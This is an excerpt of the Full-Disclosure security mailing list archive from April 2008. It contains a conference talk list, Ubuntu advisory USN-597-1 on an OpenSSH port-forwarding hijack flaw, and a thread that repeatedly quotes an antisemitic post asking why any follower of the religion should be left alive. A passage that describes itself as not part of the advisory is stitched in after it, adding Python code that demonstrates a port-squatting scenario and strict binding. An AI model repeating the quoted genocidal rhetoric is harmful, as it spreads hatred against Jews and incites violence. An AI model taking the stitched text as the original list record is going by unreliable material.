
-- -- h0 h0 h0 -- www.nopsled.net
------------------------------------------------------------------------------

From Valdis.Kletnieks at vt.edu  Wed Apr  2 01:06:17 2008
From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu)
Date: Tue, 01 Apr 2008 20:06:17 -0400
Subject: [Full-disclosure] Greedy Jews fact of the day
In-Reply-To: Your message of "Tue, 01 Apr 2008 16:21:55 PDT." <1865973b0804011621i6eb44980v1d6c307764cefdc0@mail.gmail.com>
References: <1865973b0804011621i6eb44980v1d6c307764cefdc0@mail.gmail.com>
Message-ID: <29471.1207094777@turing-police.cc.vt.edu>

On Tue, 01 Apr 2008 16:21:55 PDT, Andrew A said:
> Why should we leave a single follower of such a filthy, greedy religion
> alive? Do any of you have an idea?

You're just sore because they thought of the meme "All the riches rightfully
belong to those of our religion" before your religion did...

From erey at ernw.de  Wed Apr  2 01:20:11 2008
From: erey at ernw.de (Enno Rey)
Date: Wed, 2 Apr 2008 02:20:11 +0200
Subject: [Full-disclosure] Troopers08 Security Conference, April 23/24 (Munich/Germany)
Message-ID: <20080402002011.GF2235@ws25.ernw.de>

Troopers08 Presentations
========================

Keynote on "Invulnerable Software" - Dan Bernstein
KIDS - Kernel Intrusion Detection System - Rodrigo Branco
State of Security - Andrew Cushman, Microsoft
Release of the next revision of the free Exploit-Me series of application penetration testing tools - Nish Bhalla, Security Compass
Side Channel Analysis - Job de Haas, Riscure
Hackertools according to German law (§ 202c StGB) - Horst Speichert, Lawyer
Hardening Oracle in Corporate Environments - Alexander Kornbrust, Red-Database-Security
Virtualization: There is no spoon - Michael Kemp
Straight Talk about Cryptography - Jon Callas, PGP
Evilgrade: You have pending upgrades - Francisco Amato
"Self defending networks" - hype or essential need for international organisations? - Rolf Strehle, VOITH AG
Keynote "Virtualization: Floor Wax, Dessert Topping and The End of Information Security As We Know It?" - Christopher Hoff, Unisys
GPUs, password recovery and thunder tables - Andrey Belenko, ElcomSoft
Incident Management - tasks and organization. - Volker Kozok, German Ministry of Defense
A penetration testing learning kit - Ariel Waissbein, Core Security
Organizing and analyzing logdata with entropy - Sergey Bratus, Dartmouth College
Hacking Second Life(TM) - Michael Thumann, ERNW GmbH
Enterprise Webapplication Security Strategy at Allianz S.E., Dr. Johannes Raab, Allianz S.E.
Tapping $$$ Enterprises - Pierre Kroma
Virtual Honey Pots - Thorsten Holz, Universitaet Mannheim
SCADA and National Critical Infrastructures: is security an "optional"? - Raoul Chiesa
Data Loss Protection - Hope or Hype? - Enno Rey & Angus Blitter

--
Additional
Pre-Con Latenight Talks
Packet Wars
Evening Fun
--

thanks,

Enno Rey

--
Enno Rey

Check out www.troopers08.org!

ERNW GmbH - Breslauer Str. 28 - 69124 Heidelberg - www.ernw.de
Tel. +49 6221 480390 - Fax 6221 419008 - Cell +49 173 6745902
PGP FP 055F B3F3 FE9D 71DD C0D5 444E C611 033E 3296 1CC1

Commercial Register Heidelberg: HRB 7135
Managing Directors: Roland Fiege, Enno Rey

From tbiehn at gmail.com  Wed Apr  2 01:28:57 2008
From: tbiehn at gmail.com (T Biehn)
Date: Tue, 1 Apr 2008 20:28:57 -0400
Subject: [Full-disclosure] Greedy Jews fact of the day
In-Reply-To: <29471.1207094777@turing-police.cc.vt.edu>
References: <1865973b0804011621i6eb44980v1d6c307764cefdc0@mail.gmail.com> <29471.1207094777@turing-police.cc.vt.edu>
Message-ID: <2d6724810804011728h137f0b24p1a586a5b21eca9d3@mail.gmail.com>

Valdis,
Never took you for an anti-Semite.

On Tue, Apr 1, 2008 at 8:06 PM, wrote:

> On Tue, 01 Apr 2008 16:21:55 PDT, Andrew A said:
>
> > Why should we leave a single follower of such a filthy, greedy religion
> > alive? Do any of you have an idea?
>
> You're just sore because they thought of the meme "All the riches rightfully
> belong to those of our religion" before your religion did...

From kurt.buff at gmail.com  Wed Apr  2 01:36:58 2008
From: kurt.buff at gmail.com (Kurt Buff)
Date: Tue, 1 Apr 2008 17:36:58 -0700
Subject: [Full-disclosure] Greedy Jews fact of the day
In-Reply-To: <2d6724810804011728h137f0b24p1a586a5b21eca9d3@mail.gmail.com>
References: <1865973b0804011621i6eb44980v1d6c307764cefdc0@mail.gmail.com> <29471.1207094777@turing-police.cc.vt.edu> <2d6724810804011728h137f0b24p1a586a5b21eca9d3@mail.gmail.com>
Message-ID:

And after that message, you still shouldn't. Parse it a bit more carefully...

On Tue, Apr 1, 2008 at 5:28 PM, T Biehn wrote:
> Valdis,
> Never took you for an anti-Semite.
>
> On Tue, Apr 1, 2008 at 8:06 PM, wrote:
> > On Tue, 01 Apr 2008 16:21:55 PDT, Andrew A said:
> >
> > > Why should we leave a single follower of such a filthy, greedy religion
> > > alive? Do any of you have an idea?
> >
> > You're just sore because they thought of the meme "All the riches rightfully
> > belong to those of our religion" before your religion did...

From prb at lava.net  Wed Apr  2 01:47:07 2008
From: prb at lava.net (Peter Besenbruch)
Date: Tue, 1 Apr 2008 14:47:07 -1000
Subject: [Full-disclosure] Greedy Jews fact of the day
In-Reply-To: <2d6724810804011728h137f0b24p1a586a5b21eca9d3@mail.gmail.com>
References: <1865973b0804011621i6eb44980v1d6c307764cefdc0@mail.gmail.com> <29471.1207094777@turing-police.cc.vt.edu> <2d6724810804011728h137f0b24p1a586a5b21eca9d3@mail.gmail.com>
Message-ID: <200804011447.07910.prb@lava.net>

On Tuesday 01 April 2008 14:28:57 T Biehn wrote:
> Valdis,
> Never took you for an anti-Semite.

Maybe you haven't read enough of Valdis' posts. He knows a lot about security,
but often writes with tongue firmly planted in cheek. There really isn't a
better response to these kinds of rants.

> On Tue, Apr 1, 2008 at 8:06 PM, wrote:
> > On Tue, 01 Apr 2008 16:21:55 PDT, Andrew A said:
> > > Why should we leave a single follower of such a filthy, greedy
> > > religion alive? Do any of you have an idea?
> >
> > You're just sore because they thought of the meme "All the riches
> > rightfully belong to those of our religion" before your religion did...

--
Hawaiian Astronomical Society: http://www.hawastsoc.org
HAS Deepsky Atlas: http://www.hawastsoc.org/deepsky

From kees at ubuntu.com  Wed Apr  2 01:46:52 2008
From: kees at ubuntu.com (Kees Cook)
Date: Tue, 1 Apr 2008 17:46:52 -0700
Subject: [Full-disclosure] [USN-597-1] OpenSSH vulnerability
Message-ID: <20080402004652.GQ8254@outflux.net>

===========================================================
Ubuntu Security Notice USN-597-1             April 01, 2008
openssh vulnerability
CVE-2008-1483
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 6.10
Ubuntu 7.04
Ubuntu 7.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  openssh-client                  1:4.2p1-7ubuntu3.3

Ubuntu 6.10:
  openssh-client                  1:4.3p2-5ubuntu1.2

Ubuntu 7.04:
  openssh-client                  1:4.3p2-8ubuntu1.2

Ubuntu 7.10:
  openssh-client                  1:4.6p1-5ubuntu0.2

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

Timo Juhani Lindfors discovered that the OpenSSH client, when port
forwarding was requested, would listen on any available address family.
A local attacker could exploit this flaw on systems with IPv6 enabled
to hijack connections, including X11 forwards.
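
The flaw described in USN-597-1 above, shown as an added example that is not part of the advisory and is not OpenSSH code: a forwarding listener that keeps "any available address family" next to one that binds every family or none. It assumes the flaw plays out as another local process already holding the port on one family; the function names, the loopback-only setup and the squatting socket are hypothetical and constructed for the demonstration.

```python
import errno
import socket

# Loopback address per family; a forwarding listener is bound on each one.
LOOPBACKS = ((socket.AF_INET, "127.0.0.1"), (socket.AF_INET6, "::1"))
# errno values meaning "this host does not have that family at all".
FAMILY_MISSING = {errno.EAFNOSUPPORT, errno.EADDRNOTAVAIL}


def close_all(socks):
    for s in socks:
        s.close()


def bind_loopback(port, strict):
    """Bind `port` on the loopback address of each address family.

    strict=False keeps whichever families bind (the weak behaviour).
    strict=True requires every family present on the host to bind, and
    releases everything and raises if one of them is already taken.
    """
    socks = []
    try:
        for family, addr in LOOPBACKS:
            s = None
            try:
                s = socket.socket(family, socket.SOCK_STREAM)
                s.bind((addr, port))
                s.listen(1)
            except OSError as e:
                if s is not None:
                    s.close()
                if strict and e.errno not in FAMILY_MISSING:
                    raise  # e.g. EADDRINUSE: another process holds the port
                continue
            socks.append(s)
        if strict and not socks:
            raise OSError(errno.EADDRNOTAVAIL, "no loopback family available")
        return socks
    except OSError:
        close_all(socks)
        raise


def allocate_forward_port(start, tries=20):
    """Return (port, sockets) for the first port free on every family."""
    for port in range(start, min(start + tries, 65536)):
        try:
            return port, bind_loopback(port, strict=True)
        except OSError:
            continue
    raise OSError(errno.EADDRINUSE, "no port free on every family")


def demo():
    """Constructed scenario: another local process already holds IPv4 port P."""
    squatter = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    squatter.bind(("127.0.0.1", 0))  # port 0: the kernel picks a free port
    squatter.listen(1)
    port = squatter.getsockname()[1]
    try:
        weak = bind_loopback(port, strict=False)
        weak_families = [s.family for s in weak]  # IPv6 only, or empty
        close_all(weak)
        try:
            close_all(bind_loopback(port, strict=True))
            strict_refused = False
        except OSError:
            strict_refused = True
        chosen, socks = allocate_forward_port(port)
        close_all(socks)
    finally:
        squatter.close()
    return {"squatted": port, "weak_families": weak_families,
            "strict_refused": strict_refused, "chosen": chosen}


if __name__ == "__main__":
    print(demo())
```

On a host without an IPv6 loopback the weak variant ends up with no listener at all; the strict variant refuses the squatted port either way and moves to the next one.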
From infolookup at gmail.com  Wed Apr  2 02:48:13 2008
From: infolookup at gmail.com (infolookup at gmail.com)
Date: Wed, 2 Apr 2008 01:48:13 +0000
Subject: [Full-disclosure] Greedy Jews fact of the day
In-Reply-To: <29471.1207094777@turing-police.cc.vt.edu>
References: <1865973b0804011621i6eb44980v1d6c307764cefdc0@mail.gmail.com><29471.1207094777@turing-police.cc.vt.edu>
Message-ID: <2112875235-1207100888-cardhu_decombobulator_blackberry.rim.net-959436740-@bxe139.bisx.prod.on.blackberry>

Both Jews and Gentiles that's what the word says.
Sent from my Verizon Wireless BlackBerry

-----Original Message-----
From: Valdis.Kletnieks at vt.edu
Date: Tue, 01 Apr 2008 20:06:17
To:Andrew A
Cc:Full Disclosure
Subject: Re: [Full-disclosure] Greedy Jews fact of the day

On Tue, 01 Apr 2008 16:21:55 PDT, Andrew A said:
> Why should we leave a single follower of such a filthy, greedy religion
> alive? Do any of you have an idea?

You're just sore because they thought of the meme "All the riches rightfully
belong to those of our religion" before your religion did...

From winsoc at google